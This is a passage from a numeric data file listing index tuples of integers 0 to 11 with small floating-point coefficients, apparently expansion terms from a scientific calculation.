[0,0,4,4,9,9 , 3.81771435356e-11],
[0,0,4,4,10,10 , 4.16094839498e-11],
[0,0,4,4,11,11 , 4.16549534289e-11],
[0,0,4,5,5,10 , -1.36415762145e-12],
[0,0,4,5,6,11 , -1.12468120453e-12],
[0,0,4,5,7,10 , 6.24611745242e-14],
[0,0,4,5,8,11 , 3.04614712315e-11],
[0,0,4,5,9,10 , 3.07613922016e-11],
[0,0,4,5,10 , 5.70985957948e-10],
[0,0,4,6,6,10 , -1.20442192663e-12],
[0,0,4,6,7,11 , -8.23211682935e-13],
[0,0,4,6,8,10 , 4.67011831804e-11],
[0,0,4,6,9,11 , 4.69547908571e-11],
[0,0,4,6,11 , 8.71624326133e-10],
[0,0,4,7,7,10 , 2.11808864247e-12],
[0,0,4,7,8,11 , -3.51766728427e-11],
[0,0,4,7,9,10 , -3.51815946954e-11],
[0,0,4,7,10 , -6.69717117921e-10],
[0,0,4,8,8,10 , -7.43031772264e-12],
[0,0,4,8,9,11 , -8.67069937432e-12],
[0,0,4,8,11 , -1.4436817374e-10],
[0,0,4,9,9,10 , -9.80066841373e-12],
[0,0,4,9,10 , -1.74168909752e-10],
[0,0,4,10 , -3.73184467274e-09],
[0,0,4,10,10,10 , 5.48981115333e-12],
[0,0,4,10,11,11 , 5.14633558794e-12],
[0,0,5 , -1.14428258274e-07],
[0,0,5,5 , 8.18938345108e-09],
[0,0,5,5,5 , -1.25968919438e-10],
[0,0,5,5,5,5 , -3.92299082346e-12],
[0,0,5,5,5,7 , 6.12106043049e-12],
[0,0,5,5,5,9 , -3.22596482946e-12],
[0,0,5,5,6,6 , -1.24701774717e-11],
[0,0,5,5,6,8 , -1.76923012693e-12],
[0,0,5,5,7 , 4.59505673099e-11],
[0,0,5,5,7,7 , -7.29503290679e-12],
[0,0,5,5,7,9 , 1.3605508258e-12],
[0,0,5,5,8,8 , 2.10172680982e-11],
[0,0,5,5,9 , 4.52997407793e-10],
[0,0,5,5,9,9 , 2.26459607879e-11],
[0,0,5,5,10,10 , 2.36845019647e-11],
[0,0,5,5,11,11 , 2.50271812352e-11],
[0,0,5,6,6 , -3.77249603291e-11],
[0,0,5,6,6,7 , 1.44654368692e-11],
[0,0,5,6,6,9 , -8.65801505119e-13],
[0,0,5,6,7,8 , 3.47708493133e-14],
[0,0,5,6,8 , 6.22285751631e-10],
[0,0,5,6,8,9 , 3.39655893947e-11],
[0,0,5,6,10,11 , 3.81212713502e-11],
[0,0,5,7 , -7.14034190999e-09],
[0,0,5,7,7 , -9.85949891017e-12],
[0,0,5,7,7,7 , 8.20925628362e-12],
[0,0,5,7,7,9 , 5.9235057468e-13],
[0,0,5,7,8,8 , -2.54920080408e-11],
[0,0,5,7,9 , -4.97566934048e-10],
[0,0,5,7,9,9 , -2.60589519443e-11],
[0,0,5,7,10,10 , -2.90307011256e-11],
[0,0,5,7,11,11 , -2.96526968e-11],
[0,0,5,8,8 , -4.25108718919e-11],
[0,0,5,8,8,9 , -5.10035393161e-12],
[0,0,5,8,10,11 , 4.59593249059e-12],
[0,0,5,9 , -1.71610600975e-09],
[0,0,5,9,9 , -9.77847821021e-11],
[0,0,5,9,9,9 , -5.9482082069e-12],
[0,0,5,9,10,10 , 3.82801403586e-12],
[0,0,5,9,11,11 , 4.521831854e-12],
[0,0,5,10,10 , 1.53548829818e-10],
[0,0,5,11,11 , 1.54290485872e-10],
[0,0,6,6 , 1.28688447241e-08],
[0,0,6,6,6,6 , -3.07744355724e-11],
[0,0,6,6,6,8 , -9.45931145853e-13],
[0,0,6,6,7 , 2.14083811117e-11],
[0,0,6,6,7,7 , -1.70988890826e-11],
[0,0,6,6,7,9 , -1.6812118543e-12],
[0,0,6,6,8,8 , 5.1450800144e-11],
[0,0,6,6,9 , 9.90687910377e-10],
[0,0,6,6,9,9 , 5.22040655702e-11],
[0,0,6,6,10,10 , 5.92324059365e-11],
[0,0,6,6,11,11 , 5.8281242089e-11],
[0,0,6,7,7,8 , 2.57610321811e-12],
[0,0,6,7,8 , -7.38580851522e-10],
[0,0,6,7,8,9 , -3.90736023452e-11],
[0,0,6,7,10,11 , -4.48618142617e-11],
[0,0,6,8 , -2.93898473666e-09],
[0,0,6,8,8,8 , -9.58472005134e-12],
[0,0,6,8,9 , -1.99015822709e-10],
[0,0,6,8,9,9 , -1.23026453563e-11],
[0,0,6,8,10,10 , 3.99660792567e-12],
[0,0,6,8,11,11 , 3.93989844568e-12],
[0,0,6,9,10,11 , 2.45821662834e-12],
[0,0,6,10,11 , 1.43062057101e-10],
[0,0,7 , 8.05743303988e-08],
[0,0,7,7 , 7.89448428619e-09],
[0,0,7,7,7 , -2.53602673229e-11],
[0,0,7,7,7,7 , -9.27385358916e-12],
[0,0,7,7,7,9 , -2.41463541249e-12],
[0,0,7,7,8,8 , 2.89628974434e-11],
[0,0,7,7,9 , 5.71231597864e-10],
[0,0,7,7,9,9 , 2.89556348523e-11],
[0,0,7,7,10,10 , 3.40847368419e-11],
[0,0,7,7,11,11 , 3.42459255163e-11],
[0,0,7,8,8 , 2.30693801862e-10],
[0,0,7,8,8,9 , 1.33565400469e-11],
[0,0,7,8,10,11 , 1.96752208058e-12],
[0,0,7,9 , 4.61996720708e-09],
[0,0,7,9,9 , 2.6065549769e-10],
[0,0,7,9,9,9 , 1.62717997247e-11],
[0,0,7,9,10,10 , 3.68604643397e-12],
[0,0,7,9,11,11 , 2.71853647429e-12],
[0,0,7,10,10 , -7.05702727395e-12],
[0,0,7,11,11 , -1.40132666441e-11],
[0,0,8 , -1.58670446844e-18],
[0,0,8,8 , -5.41205791937e-08],
[0,0,8,8,8 , -1.07524981644e-20],
[0,0,8,8,8,8 , -9.92371424521e-11],
[0,0,8,8,9 , -2.25892607061e-09],
[0,0,8,8,9,9 , -1.00106599821e-10],
[0,0,8,8,10,10 , -1.0876441467e-10],
[0,0,8,8,11,11 , -1.09647743874e-10],
[0,0,8,9,10,11 , -1.09848235417e-10],
[0,0,8,10,11 , -2.46572287916e-09],
[0,0,9 , -1.03044025211e-06],
[0,0,9,9 , -5.38820274845e-08],
[0,0,9,9,9 , -2.21579383384e-09],
[0,0,9,9,9,9 , -1.10456371096e-10],
[0,0,9,9,10,10 , -1.11765534515e-10],
[0,0,9,9,11,11 , -1.11578269201e-10],
[0,0,9,10,10 , -2.48321145903e-09],
[0,0,9,11,11 , -2.46714289926e-09],
[0,0,10 , 1.18028747244e-19],
[0,0,10,10 , -5.78787808728e-08],
[0,0,10,10,10,10 , -1.19180318758e-10],
[0,0,10,10,11,11 , -1.19715423258e-10],
[0,0,11,11 , -5.68500862989e-08],
[0,0,11,11,11,11 , -1.22657611884e-10],
[0,1,1,1,1,11 , 1.34847266721e-12],
[0,1,1,1,2,4 , 5.04610102202e-12],
[0,1,1,1,2,10 , -1.83285949989e-13],
[0,1,1,1,3 , 3.34998276304e-11],
[0,1,1,1,3,5 , -3.92710834543e-12],
[0,1,1,1,3,7 , 4.28112152342e-12],
[0,1,1,1,3,9 , 1.78346472849e-12],
[0,1,1,2,2,11 , -9.4293056666e-14],
[0,1,1,2,3,6 , 6.47797325159e-12],
[0,1,1,2,3,8 , -1.22411417835e-12],
[0,1,1,3,3,11 , 7.6044675556e-13],
[0,1,1,4,4,11 , 9.90248311432e-13],
[0,1,1,4,5,6 , -3.51905998721e-12],
[0,1,1,4,5,8 , 2.88224874468e-13],
[0,1,1,4,6 , 1.19204486561e-11],
[0,1,1,4,6,7 , 4.02651170079e-12],
[0,1,1,4,6,9 , 6.91944274583e-13],
[0,1,1,4,7,8 , -9.35383575903e-13],
[0,1,1,4,8 , 2.8734468811e-10],
[0,1,1,4,8,9 , 1.52010286787e-11],
[0,1,1,4,10,11 , 1.74171259458e-11],
[0,1,1,5,5,11 , -4.2749846822e-13],
[0,1,1,5,6,10 , -1.02369869837e-12],
[0,1,1,5,7,11 , 1.78615457878e-13],
[0,1,1,5,8,10 , 1.25048333763e-11],
[0,1,1,5,9,11 , 1.22346972145e-11],
[0,1,1,5,11 , 2.25768300951e-10],
[0,1,1,6,6,11 , -9.53327876909e-13],
[0,1,1,6,7,10 , 2.80021536711e-13],
[0,1,1,6,8,11 , 1.92040375196e-11],
[0,1,1,6,9,10 , 1.97594795207e-11],
[0,1,1,6,10 , 3.83138311386e-10],
[0,1,1,7,7,11 , 3.61465083694e-13],
[0,1,1,7,8,10 , -1.4540800106e-11],
[0,1,1,7,9,11 , -1.42107852601e-11],
[0,1,1,7,11 , -2.69832455188e-10],
[0,1,1,8,8,11 , -1.89637028956e-12],
[0,1,1,8,9,10 , -2.59058996133e-12],
[0,1,1,8,10 , -3.31968814196e-11],
[0,1,1,9,9,11 , -3.19381916761e-12],
[0,1,1,9,11 , -4.42872233684e-11],
[0,1,1,10,10,11 , 2.76687598443e-12],
[0,1,1,11 , -3.73774260318e-10],
[0,1,1,11,11,11 , 2.10937827611e-12],
[0,1,2,2,2,4 , 5.95493589464e-12],
[0,1,2,2,2,10 , -1.33627615773e-13],
[0,1,2,2,3 , 1.28720100785e-11],
[0,1,2,2,3,5 , -4.20975423102e-12],
[0,1,2,2,3,7 , 4.90864522654e-12],
[0,1,2,2,3,9 , 1.16954780508e-12],
[0,1,2,3,3,4 , 5.1946263277e-12],
[0,1,2,3,3,10 , -3.92111129031e-13],
[0,1,2,4 , -4.14977607936e-09],
[0,1,2,4,4,4 , 3.71368128748e-12],
[0,1,2,4,4,10 , -7.80901185519e-13],
[0,1,2,4,5 , -2.83848258758e-12],
[0,1,2,4,5,5 , 2.2563288653e-12],
[0,1,2,4,5,7 , -2.59772897282e-12],
[0,1,2,4,5,9 , -1.87116573284e-13],
[0,1,2,4,6,6 , 5.30025255607e-12],
[0,1,2,4,6,8 , -3.97954453388e-13],
[0,1,2,4,7 , 6.72691892722e-12],
[0,1,2,4,7,7 , 2.98166507316e-12],
[0,1,2,4,7,9 , 8.7380371784e-13],
[0,1,2,4,8,8 , -1.57719945374e-11],
[0,1,2,4,9 , -2.96642668112e-10],
[0,1,2,4,9,9 , -1.56975108142e-11],
[0,1,2,4,10,10 , -1.79029904086e-11],
[0,1,2,4,11,11 , -1.78396285924e-11],
[0,1,2,5,5,10 , 8.91754257764e-13],
[0,1,2,5,6,11 , 1.02703032837e-12],
[0,1,2,5,7,10 , -4.38192296079e-13],
[0,1,2,5,8,11 , -1.27450732547e-11],
[0,1,2,5,9,10 , -1.2826933431e-11],
[0,1,2,5,10 , -2.44439185333e-10],
[0,1,2,6,6,10 , 1.43739901836e-12],
[0,1,2,6,7,11 , -2.7845675034e-13],
[0,1,2,6,8,10 , -1.97344233454e-11],
[0,1,2,6,9,11 , -1.97733565885e-11],
[0,1,2,6,11 , -3.75759983502e-10],
[0,1,2,7,7,10 , -4.08378826746e-13],
[0,1,2,7,8,11 , 1.49132875098e-11],
[0,1,2,7,9,10 , 1.4869636638e-11],
[0,1,2,7,10 , 2.88313101802e-10],
[0,1,2,8,8,10 , 1.81207193632e-12],
[0,1,2,8,9,11 , 2.302456893e-12],
[0,1,2,8,11 , 1.7789953781e-11],
[0,1,2,9,9,10 , 2.59968602042e-12],
[0,1,2,9,10 , 2.82647761966e-11],
[0,1,2,10 , 6.5080948097e-13],
[0,1,2,10,10,10 , -2.95345585535e-12],
[0,1,2,10,11,11 , -2.78357125253e-12],
[0,1,3 , -2.53914916777e-08],
[0,1,3,3,3 , 2.41085177229e-11],
[0,1,3,3,3,5 , -3.34997545142e-12],
[0,1,3,3,3,7 , 3.7663250479e-12],
[0,1,3,3,3,9 , 1.43036697262e-12],
[0,1,3,4,4 , 3.46386306461e-11],
[0,1,3,4,4,5 , -2.88308814977e-12],
[0,1,3,4,4,7 , 3.0812660039e-12],
[0,1,3,4,4,9 , 1.53546776606e-12],
[0,1,3,4,5,10 , -9.20232881105e-14],
[0,1,3,4,6,11 , 1.63409530881e-13],
[0,1,3,4,7,10 , -5.68982876874e-13],
[0,1,3,4,8,11 , 1.56293295142e-11],
[0,1,3,4,9,10 , 1.55765985315e-11],
[0,1,3,4,10 , 2.9567554511e-10],
[0,1,3,5 , 2.55602633244e-09],
[0,1,3,5,5 , 1.29051635141e-11],
[0,1,3,5,5,5 , -2.07208909516e-12],
[0,1,3,5,5,7 , 2.02506387755e-12],
[0,1,3,5,5,9 , 5.69085976834e-14],
[0,1,3,5,6,6 , -3.96582772243e-12],
[0,1,3,5,6,8 , -1.57572689426e-13],
[0,1,3,5,7 , -4.32506883401e-12],
[0,1,3,5,7,7 , -2.29806046989e-12],
[0,1,3,5,7,9 , -3.45315230037e-13],
[0,1,3,5,8,8 , 1.17842384249e-11],
[0,1,3,5,9 , 2.10843447132e-10],
[0,1,3,5,9,9 , 1.14343466753e-11],
[0,1,3,5,10,10 , 1.25504211016e-11],
[0,1,3,5,11,11 , 1.23597450825e-11],
[0,1,3,6,6 , -3.58501204788e-12],
[0,1,3,6,6,7 , 4.67109588261e-12],
[0,1,3,6,6,9 , 3.23430321626e-13],
[0,1,3,6,7,8 , -6.26899928453e-13],
[0,1,3,6,8 , 3.3756782904e-10],
[0,1,3,6,8,9 , 1.76840770354e-11],
[0,1,3,6,10,11 , 1.93380226992e-11],
[0,1,3,7 , -3.52102975077e-09],
[0,1,3,7,7 , 6.72340969034e-12],
[0,1,3,7,7,7 , 2.69443077085e-12],
[0,1,3,7,7,9 , 1.00260683073e-12],
[0,1,3,7,8,8 , -1.35247786881e-11],
[0,1,3,7,9 , -2.43729065068e-10],
[0,1,3,7,9,9 , -1.3035052563e-11],
[0,1,3,7,10,10 , -1.4851252587e-11],
[0,1,3,7,11,11 , -1.47091030825e-11],
[0,1,3,8,8 , -7.93897507477e-11],
[0,1,3,8,8,9 , -4.64543900792e-12],
[0,1,3,8,10,11 , 2.23018484779e-14],
[0,1,3,9 , -1.85550535072e-09],
[0,1,3,9,9 , -1.00399242125e-10],
[0,1,3,9,9,9 , -5.16516037523e-12],
[0,1,3,9,10,10 , -3.59914581628e-13],
[0,1,3,9,11,11 , -6.21919604332e-13],
[0,1,3,10,10 , 1.76698003321e-11],
[0,1,3,11,11 , 1.40732574451e-11],
[0,2,2,2,2,11 , -5.0552144682e-13],
[0,2,2,2,3,6 , 6.3836274e-12],
[0,2,2,2,3,8 , -9.94418705862e-13],
[0,2,2,3,3,11 , 1.20070094449e-13],
[0,2,2,4,4,11 , 7.0812279824e-13],
[0,2,2,4,5,6 , -3.64698573659e-12],
[0,2,2,4,5,8 , 5.00784773821e-14],
[0,2,2,4,6 , -1.26606680255e-12],
[0,2,2,4,6,7 , 4.1011803974e-12],
[0,2,2,4,6,9 , 3.33349887462e-13],
[0,2,2,4,7,8 , -7.18927556246e-13],
[0,2,2,4,8 , 3.01494279243e-10],
[0,2,2,4,8,9 , 1.61401317222e-11],
[0,2,2,4,10,11 , 1.83156091124e-11],
[0,2,2,5,5,11 , -1.32293425231e-12],
[0,2,2,5,6,10 , -1.00495482868e-12],
[0,2,2,5,7,11 , 6.21687800292e-13],
[0,2,2,5,8,10 , 1.29589000272e-11],
[0,2,2,5,9,11 , 1.32788525465e-11],
[0,2,2,5,11 , 2.55248724053e-10],
[0,2,2,6,6,11 , -1.59345863305e-12],
[0,2,2,6,7,10 , 1.87258582455e-13],
[0,2,2,6,8,11 , 2.01624560185e-11],
[0,2,2,6,9,10 , 2.00033926685e-11],
[0,2,2,6,10 , 3.7947424466e-10],
[0,2,2,7,7,11 , 2.60631335203e-13],
[0,2,2,7,8,10 , -1.53138128908e-11],
[0,2,2,7,9,11 , -1.55506426129e-11],
[0,2,2,7,11 , -3.02719432918e-10],
[0,2,2,8,8,11 , -1.70064108517e-12],
[0,2,2,8,9,10 , -2.08128386594e-12],
[0,2,2,8,10 , -9.37185549575e-12],
[0,2,2,9,9,11 , -1.99968295343e-12],
[0,2,2,9,11 , -1.24104284135e-12],
[0,2,2,10,10,11 , 2.36317822683e-12],
[0,2,2,11 , 1.0158648426e-09],
[0,2,2,11,11,11 , 3.02937579686e-12],
[0,2,3,3,3,6 , 5.35178762158e-12],
[0,2,3,3,3,8 , -1.18580662812e-12],
[0,2,3,4,4,6 , 4.48686594744e-12],
[0,2,3,4,4,8 , -1.52161398534e-12],
[0,2,3,4,5,11 , 7.37707722934e-14],
[0,2,3,4,6,10 , -3.05114550312e-14],
[0,2,3,4,7,11 , 5.36841889443e-13],
[0,2,3,4,8,10 , -1.60236616741e-11],
[0,2,3,4,9,11 , -1.60242655258e-11],
[0,2,3,4,11 , -3.02949896796e-10],
[0,2,3,5,5,6 , 2.71781573421e-12],
[0,2,3,5,5,8 , 3.20380273824e-13],
[0,2,3,5,6 , 6.54071268116e-13],
[0,2,3,5,6,7 , -3.13817078645e-12],
[0,2,3,5,6,9 , -5.51795242268e-14],
[0,2,3,5,7,8 , 2.48779350023e-13],
[0,2,3,5,8 , -2.26166140701e-10],
[0,2,3,5,8,9 , -1.18414945492e-11],
[0,2,3,5,10,11 , -1.28038092374e-11],
[0,2,3,6 , -4.6821218473e-09],
[0,2,3,6,6,6 , 6.4895874384e-12],
[0,2,3,6,6,8 , 8.52476847459e-14],
[0,2,3,6,7 , -2.81587691745e-12],
[0,2,3,6,7,7 , 3.71644882162e-12],
[0,2,3,6,7,9 , 6.79689714728e-13],
[0,2,3,6,8,8 , -1.82263470301e-11],
[0,2,3,6,9 , -3.4163537875e-10],
[0,2,3,6,9,9 , -1.81421146411e-11],
[0,2,3,6,10,10 , -1.97962505432e-11],
[0,2,3,6,11,11 , -1.97997609376e-11],
[0,2,3,7,7,8 , -1.00016431929e-12],
[0,2,3,7,8 , 2.63901657863e-10],
[0,2,3,7,8,9 , 1.35751507255e-11],
[0,2,3,7,10,11 , 1.51200206576e-11],
[0,2,3,8 , 1.24988966555e-09],
[0,2,3,8,8,8 , 4.08739909548e-12],
[0,2,3,8,9 , 8.41347636881e-11],
[0,2,3,8,9,9 , 5.19304327675e-12],
[0,2,3,8,10,10 , -4.14667652014e-13],
[0,2,3,8,11,11 , -1.78220342266e-13],
[0,2,3,9,10,11 , 2.34824173932e-13],
[0,2,3,10,11 , -2.69949118719e-11],
[0,3,3,3,3,11 , 8.29967288969e-13],
[0,3,3,4,4,11 , 9.57631534621e-13],
[0,3,3,4,5,6 , -2.98225247832e-12],
[0,3,3,4,5,8 , 6.79219246792e-13],
[0,3,3,4,6 , 3.53534257767e-11],
[0,3,3,4,6,7 , 3.18412626326e-12],
[0,3,3,4,6,9 , 1.36577590471e-12],
[0,3,3,4,7,8 , -1.40550274511e-12],
[0,3,3,4,8 , 2.84655145298e-10],
[0,3,3,4,8,9 , 1.44727380771e-11],
[0,3,3,4,10,11 , 1.51682004909e-11],
[0,3,3,5,5,11 , -4.03661294756e-13],
[0,3,3,5,6,10 , -5.79030929279e-13],
[0,3,3,5,7,11 , 7.73819766537e-14],
[0,3,3,5,8,10 , 1.10797522688e-11],
[0,3,3,5,9,11 , 1.09167059313e-11],
[0,3,3,5,11 , 2.01923244328e-10],
[0,3,3,6,6,11 , -7.27576523439e-13],
[0,3,3,6,7,10 , -6.56547333827e-15],
[0,3,3,6,8,11 , 1.69341700292e-11],
[0,3,3,6,9,10 , 1.69469132513e-11],
[0,3,3,6,10 , 3.18301326311e-10],
[0,3,3,7,7,11 , 3.77391135055e-13],
[0,3,3,7,8,10 , -1.29202889564e-11],
[0,3,3,7,9,11 , -1.2657897928e-11],
[0,3,3,7,11 , -2.37134810442e-10],
[0,3,3,8,8,11 , -2.76111826271e-12],
[0,3,3,8,9,10 , -2.92799879821e-12],
[0,3,3,8,10 , -4.44411635381e-11],
[0,3,3,9,9,11 , -3.54114503177e-12],
[0,3,3,9,11 , -6.02046164424e-11],
[0,3,3,10,10,11 , 2.07990854148e-12],
[0,3,3,11 , -1.37443379481e-09],
[0,3,3,11,11,11 , 1.8373164673e-12],
[0,4,4,4,4,11 , 3.71182470965e-12],
[0,4,4,4,5,6 , -1.21444674967e-11],
[0,4,4,4,5,8 , 3.27554393994e-12],
[0,4,4,4,6 , 1.32952375699e-10],
[0,4,4,4,6,7 , 1.31233056175e-11],
[0,4,4,4,6,9 , 5.47766058454e-12],
[0,4,4,4,7,8 , -4.98842174759e-12],
[0,4,4,4,8 , 6.3971149602e-10],
[0,4,4,4,8,9 , 3.36989699749e-11],
[0,4,4,4,10,11 , 3.66327179536e-11],
[0,4,4,5,5,11 , -3.44705450963e-13],
[0,4,4,5,6,10 , -5.5740264706e-13],
[0,4,4,5,7,11 , -6.13092716755e-13],
[0,4,4,5,8,10 , 2.65631917031e-11],
[0,4,4,5,9,11 , 2.67240681297e-11],
[0,4,4,5,11 , 4.92650024531e-10],
[0,4,4,6,6,11 , -1.37782566245e-13],
[0,4,4,6,7,10 , -1.16640535708e-12],
[0,4,4,6,8,11 , 4.07300895033e-11],
[0,4,4,6,9,10 , 4.08350970595e-11],
[0,4,4,6,10 , 7.58559167699e-10],
[0,4,4,7,7,11 , 2.40221406739e-12],
[0,4,4,7,8,10 , -3.04006216057e-11],
[0,4,4,7,9,11 , -3.01128210694e-11],
[0,4,4,7,11 , -5.63783740511e-10],
[0,4,4,8,8,11 , -7.06590017962e-12],
[0,4,4,8,9,10 , -8.2670428696e-12],
[0,4,4,8,10 , -1.57502889513e-10],
[0,4,4,9,9,11 , -8.9900433045e-12],
[0,4,4,9,11 , -1.84719451048e-10],
[0,4,4,10,10,11 , 3.825863722e-12],
[0,4,4,11 , -5.02650223456e-09],
[0,4,4,11,11,11 , 4.17558959214e-12],
[0,4,5,5,5,6 , -7.26502653347e-12],
[0,4,5,5,5,8 , -8.65775002895e-13],
[0,4,5,5,6 , 1.91397295669e-12],
[0,4,5,5,6,7 , 8.23067108797e-12],
[0,4,5,5,6,9 , -2.31697766242e-13],
[0,4,5,5,7,8 , 6.34846923782e-14],
[0,4,5,5,8 , 3.50463155995e-10],
[0,4,5,5,8,9 , 1.93477136421e-11],
[0,4,5,5,10,11 , 2.15479607422e-11],
[0,4,5,6 , 5.66393299284e-09],
[0,4,5,6,6,6 , -1.67069739409e-11],
[0,4,5,6,6,8 , -4.02264816693e-13],
[0,4,5,6,7 , 2.18021761398e-12],
[0,4,5,6,7,7 , -9.53533105875e-12],
[0,4,5,6,7,9 , -9.24306625497e-13],
[0,4,5,6,8,8 , 2.92469480361e-11],
[0,4,5,6,9 , 5.3734315177e-10],
[0,4,5,6,9,9 , 2.96218642641e-11],
[0,4,5,6,10,10 , 3.31076500033e-11],
[0,4,5,6,11,11 , 3.33021270427e-11],
[0,4,5,7,7,8 , 1.52125068709e-12],
[0,4,5,7,8 , -4.11185559433e-10],
[0,4,5,7,8,9 , -2.1896811716e-11],
[0,4,5,7,10,11 , -2.51504006521e-11],
[0,4,5,8 , -2.22408322244e-09],
[0,4,5,8,8,8 , -3.75488797088e-12],
[0,4,5,8,9 , -1.08998028253e-10],
[0,4,5,8,9,9 , -5.96041482036e-12],
[0,4,5,8,10,10 , 3.47235485415e-12],
[0,4,5,8,11,11 , 3.52830283314e-12],
[0,4,5,9,10,11 , 2.45603590781e-12],
[0,4,5,10,11 , 8.13877804611e-11],
[0,4,6 , -1.0825523261e-07],
[0,4,6,6,6 , -2.72611307889e-11],
[0,4,6,6,6,7 , 1.97190913288e-11],
[0,4,6,6,6,9 , 5.67606960538e-13],
[0,4,6,6,7,8 , -1.49824473838e-12],
[0,4,6,6,8 , 8.17972916446e-10],
[0,4,6,6,8,9 , 4.49264417096e-11],
[0,4,6,6,10,11 , 5.13657576544e-11],
[0,4,6,7 , -7.75483055807e-09],
[0,4,6,7,7 , 1.78407730422e-11],
[0,4,6,7,7,7 , 1.10091750224e-11],
[0,4,6,7,7,9 , 2.62791849136e-12],
[0,4,6,7,8,8 , -3.37856069125e-11],
[0,4,6,7,9 , -6.1606555473e-10],
[0,4,6,7,9,9 , -3.3486055053e-11],
[0,4,6,7,10,10 , -3.91684419897e-11],
[0,4,6,7,11,11 , -3.91854474703e-11],
[0,4,6,8,8 , -1.75275907303e-10],
[0,4,6,8,8,9 , -1.06431277834e-11],
[0,4,6,8,10,11 , 2.26729737399e-12],
[0,4,6,9 , -4.76584915391e-09],
[0,4,6,9,9 , -2.27388938072e-10],
[0,4,6,9,9,9 , -1.24731589892e-11],
[0,4,6,9,10,10 , 1.13406358291e-12],
[0,4,6,9,11,11 , 1.24191304407e-12],
[0,4,6,10,10 , 1.01644144925e-10],
[0,4,6,11,11 , 9.4681433027e-11],
[0,4,7,7,7,8 , -2.99531195512e-12],
[0,4,7,7,8 , 4.61596287111e-10],
[0,4,7,7,8,9 , 2.47331134406e-11],
[0,4,7,7,10,11 , 2.95742398946e-11],
[0,4,7,8 , 4.88332151806e-09],
[0,4,7,8,8,8 , 1.16135843311e-11],
[0,4,7,8,9 , 2.31636925336e-10],
[0,4,7,8,9,9 , 1.29165789966e-11],
[0,4,7,8,10,10 , 2.62826471208e-12],
[0,4,7,8,11,11 , 2.63714271351e-12],
[0,4,7,9,10,11 , 3.39950356132e-12],
[0,4,7,10,11 , 1.34019443251e-11],
[0,4,8 , -8.00613253629e-07],
[0,4,8,8 , -1.45727510441e-19],
[0,4,8,8,8 , -1.99842356241e-09],
[0,4,8,8,8,9 , -8.73496187832e-11],
[0,4,8,8,10,11 , -9.60371264378e-11],
[0,4,8,9 , -4.53992551792e-08],
[0,4,8,9,9 , -1.98290289226e-09],
[0,4,8,9,9,9 , -8.75365611249e-11],
[0,4,8,9,10,10 , -9.65893788137e-11],
[0,4,8,9,11,11 , -9.67415004682e-11],
[0,4,8,10,10 , -2.16746221261e-09],
[0,4,8,11,11 , -2.17746601662e-09],
[0,4,9 , 1.30159847235e-18],
[0,4,9,9 , 1.47012742318e-19],
[0,4,9,9,10,11 , -9.7038212963e-11],
[0,4,9,10,11 , -2.1776202474e-09],
[0,4,10,10 , -7.60511923133e-20],
[0,4,10,10,10,11 , -1.04519898256e-10],
[0,4,10,11 , -4.88865016184e-08],
[0,4,10,11,11,11 , -1.04807753474e-10],
[0,4,11 , 5.53747789267e-20],
[0,4,11,11 , 7.70303673634e-20],
[0,5 , 1.86347248396e-20],
[0,5,5,5,5,11 , -3.92000249573e-12],
[0,5,5,5,6,10 , -2.80699845077e-12],
[0,5,5,5,7,11 , 2.60131665767e-12],
[0,5,5,5,8,10 , 1.43885337761e-11],
[0,5,5,5,9,11 , 1.56947316547e-11],
[0,5,5,5,11 , 3.19809203679e-10],
[0,5,5,6,6,11 , -3.33842155183e-12],
[0,5,5,6,7,10 , 2.00312238025e-12],
[0,5,5,6,8,11 , 2.35476239885e-11],
[0,5,5,6,9,10 , 2.37599937389e-11],
[0,5,5,6,10 , 4.47429125005e-10],
[0,5,5,7,7,11 , -1.17992411069e-12],
[0,5,5,7,8,10 , -1.77406595956e-11],
[0,5,5,7,9,11 , -1.81664891252e-11],
[0,5,5,7,11 , -3.61755330066e-10],
[0,5,5,8,8,11 , 3.5621629319e-12],
[0,5,5,8,9,10 , 2.72930913427e-12],
[0,5,5,8,10 , 1.13846777837e-10],
[0,5,5,9,9,11 , 2.74209970714e-12],
[0,5,5,9,11 , 9.36316954769e-11],
[0,5,5,10,10,11 , 8.30371283351e-12],
[0,5,5,11 , 2.61303477792e-09],
[0,5,5,11,11,11 , 9.12097457748e-12],
[0,5,6,6,6,10 , -4.35509161212e-12],
[0,5,6,6,7,11 , 2.04758553885e-12],
[0,5,6,6,8,10 , 3.61601615926e-11],
[0,5,6,6,9,11 , 3.64656916779e-11],
[0,5,6,6,11 , 6.87291859358e-10],
[0,5,6,7,7,10 , -3.90761128724e-13],
[0,5,6,7,8,11 , -2.77086441005e-11],
[0,5,6,7,9,10 , -2.77261773797e-11],
[0,5,6,7,10 , -5.34618317497e-10],
[0,5,6,8,8,10 , 2.81223123908e-12],
[0,5,6,8,9,11 , 1.92693920398e-12],
[0,5,6,8,11 , 1.02642929109e-10],
[0,5,6,9,9,10 , 1.12481774942e-12],
[0,5,6,9,10 , 7.94927714964e-11],
[0,5,6,10 , 3.01287834074e-09],
[0,5,6,10,10,10 , 1.11730248581e-11],
[0,5,6,10,11,11 , 1.04175728236e-11],
[0,5,7,7,7,11 , -3.73839297434e-13],
[0,5,7,7,8,10 , 2.08532282024e-11],
[0,5,7,7,9,11 , 2.09914487805e-11],
[0,5,7,7,11 , 4.16255169879e-10],
[0,5,7,8,8,11 , 9.22496874151e-13],
[0,5,7,8,9,10 , 1.55234839125e-12],
[0,5,7,8,10 , -1.76531599671e-11],
[0,5,7,9,9,11 , 1.82559980697e-12],
[0,5,7,9,11 , -1.24193113787e-11],
[0,5,7,10,10,11 , -4.51560826846e-12],
[0,5,7,11 , -1.36683753335e-09],
[0,5,7,11,11,11 , -4.63670082365e-12],
[0,5,8 , -2.87858853168e-20],
[0,5,8,8,8,10 , -6.92522321572e-11],
[0,5,8,8,9,11 , -7.03792786266e-11],
[0,5,8,8,11 , -1.57106376594e-09],
[0,5,8,9,9,10 , -7.04746563921e-11],
[0,5,8,9,10 , -1.57033964821e-09],
[0,5,8,10 , -3.54130357284e-08],
[0,5,8,10,10,10 , -7.59006520678e-11],
[0,5,8,10,11,11 , -7.64995611858e-11],
[0,5,8,11 , -2.80000637349e-20],
[0,5,9,9,9,11 , -7.14898239667e-11],
[0,5,9,9,11 , -1.58138695325e-09],
[0,5,9,10 , 3.06273961555e-20],
[0,5,9,10,10,11 , -7.70848643627e-11],
[0,5,9,11 , -3.52618931153e-08],
[0,5,9,11,11,11 , -7.77048365252e-11],
[0,5,10 , -4.32264735786e-19],
[0,5,10,10,11 , -1.73752122184e-09],
[0,5,11 , -5.7478067489e-07],
[0,5,11,11,11 , -1.75943923619e-09],
[0,6,6,6,6,11 , -5.5697180215e-12],
